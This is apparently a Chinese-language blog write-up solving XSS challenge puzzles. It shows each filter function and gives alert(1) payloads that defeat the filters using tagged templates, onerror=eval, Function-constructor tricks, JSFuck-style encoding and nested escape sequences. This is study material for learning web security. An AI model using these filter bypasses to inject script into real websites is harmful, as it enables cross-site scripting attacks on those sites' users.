Well
题目:
function escape(s) {
http://www.avlidienbrunn.se/xsschallenge/
s = s.replace(/[\r\n\u2028\u2029\\;,()\[\]<]/g, '');
return "<script> var email = '" + s + "'; <\/script>";
}
由於题目有限制无法使用 ()
,我们可以使用 String.fromCharCode
40与 `String.fromCharCode`41
替代 ()
ANS
'+{valueOf:Function`baba${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`}//
'+{toString:Function`baba${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`}//
No
此题无法用 firefox,可以使用 chrome
题目:
// submitted by Stephen Leppik
function escape(s) {
s = s.replace(/[()`<]/g, ''); // no function calls
return '<script>\n' +
'var string = "' + s + '";\n' +
'console.log(string);\n' +
'</script>';
}
()
<` 去除。解题:
window.onerror
是 JavaScript 在 runtime error 时,会触发的错误处理函数
eval
覆盖 onerror
函数,再用 throw
手动触发错误。ANS: ";onerror=eval;throw'=alert\x281\x29';//
K'Z'K (1)
题目:
// submitted by Stephen Leppik
function escape(s) {
// remove vowels in honor of K'Z'K the Destroyer
s = s.replace(/[aeiouy]/gi, '');
return '<script>console.log("' + s + '");</script>';
}
解题:
[]["p\x6fp"]["c\x6fnstr\x75ct\x6fr"]
会得到 function constructor''+!1+!0+{}[0]+{}
会得到 "falsetrueundefined[object Object]"
ANS:
");[]["p\x6fp"]["c\x6fnstr\x75ct\x6fr"]('\x61l\x65rt(1)')()//
");_=''+!1+!0+{}[0]+{};[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//
");[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])//
K'Z'K (2)
function escape(s) {
// remove vowels and escape sequences in honor of K'Z'K
// y is only sometimes a vowel, so it's only removed as a literal
s = s.replace(/[aeiouy]|\\((x|u00)([46][159f]|[57]5)|1([04][15]|[15][17]|[26]5))/gi, '')
// remove certain characters that can be used to get vowels
s = s.replace(/[{}!=<>]/g, '');
return '<script>console.log("' + s + '");</script>';
}
例如 \x6f
会被替换成空字串
\ \x6f x6f 只有一个连续字元为 \x6f,所以当 \x6f 替换为空字串时,剩下的字串会组成 \x6f
ANS
");[]["p\\x6fx6fp"]["c\\x6fx6fnstr\\x75x75ct\\x6fx6fr"]('\\x61x61l\\x65x65rt(1)')()//
K'Z'K (3)
题目:
// submitted by Stephen Leppik
function escape(s) {
// remove vowels in honor of K'Z'K the Destroyer
s = s.replace(/[aeiouy]/gi, '');
// remove certain characters that can be used to get vowels
s = s.replace(/[{}!=<>\\]/g, '');
return '<script>console.log("' + s + '");</script>';
}
{}!=<>\
也过滤了!
,本题无法直接使用 JSFuck\
,因此也无法在字串中用 Hex 或 Oct 代替母音解题:
虽然无法用 !
,但所需的字元依然可以取得,例如:
''+[][[]]
: 'undefined'
,可以取得 e
i
u
+[][[]]+''
: 'NaN'
,可以取得 a
[][(+[][[]]+'')[1] + 't']+''
:
"function at() {
[native code]
}"
可以取得 o
如此一来, 'c' + ([][(+[][[]]+'')[1] + 't']+'')[6]+ 'nstr' + (''+[][[]])[0] + 'ct' + ([][(+[][[]]+'')[1] + 't']+'')[6] + 'r'
就构成了 constructor
,而 (+[][[]]+'')[1] + 'l' + (''+[][[]])[3] + 'rt(1)'
就构成了 alert(1)
ANS:
");[][(+[][[]]+'')[1]+'t']['c'+([][(+[][[]]+'')[1]+'t']+'')[6]+'nstr'+(''+[][[]])[0]+'ct'+([][(+[][[]]+'')[1]+'t']+'')[6]+'r']((+[][[]]+'')[1]+'l'+(''+[][[]])[3] + 'rt(1)')()//
");[]['m'+(++[][[]]+[])[1]+'p']['c'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'nstr'+([][[]]+[])[0]+'ct'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'r']((++[][[]]+[])[1]+'l'+([][[]]+[])[3]+'rt(1)')()//
<<: Youtube Analytics API 教学 - 内容管理员
>>: D25 - 彭彭的课程# Python 类别的定义与使用
云服务器(Elastic Compute Service,ECS) ECS是阿里云上提供服务器租用的...
介绍 Artisan 是 Laravel 里的指令列介面名称,当开发应用程序时,它提供了许多有用的指...
DAY11 MongoDB 深入聚合与常见问题 MongoDB 的运算子前面有提到过,那是属於查询用...
二.电子商务->金流->後台对帐->销单出货 进入商城,加入购物车,并结帐 采客制...
不怎麽重要的前言 到现在我们大概介绍完了所有的回圈语法,大家可以依照自己的需要使用不同的回圈。 这次...